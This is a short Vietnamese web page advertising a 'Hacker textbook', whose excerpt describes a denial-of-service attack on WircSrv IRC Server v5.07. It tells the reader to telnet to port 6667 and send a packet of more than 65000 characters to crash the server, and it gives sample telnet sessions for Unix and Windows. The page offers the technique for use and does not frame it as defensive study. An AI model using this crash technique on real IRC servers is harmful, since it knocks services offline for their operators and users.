Trang chủ » Giáo trình tổng hợp » Giáo trình Hacker

Giáo trình Hacker

1788 Lượt xem

Giáo trình Hacker

Xem Tải xuống Kỹ thuật tấn công DoS vào WircSrv Irc Server v5.07 :
WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:
Nếu bạn dùng Unix:[hellme@die­communitech.net$ telnet irc.example.com 6667
Trying example.com.
Connected to example.com.
Escape character is `^]`.[buffer]
Windows cũng tương tự:
telnet irc.example.com 6667
Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự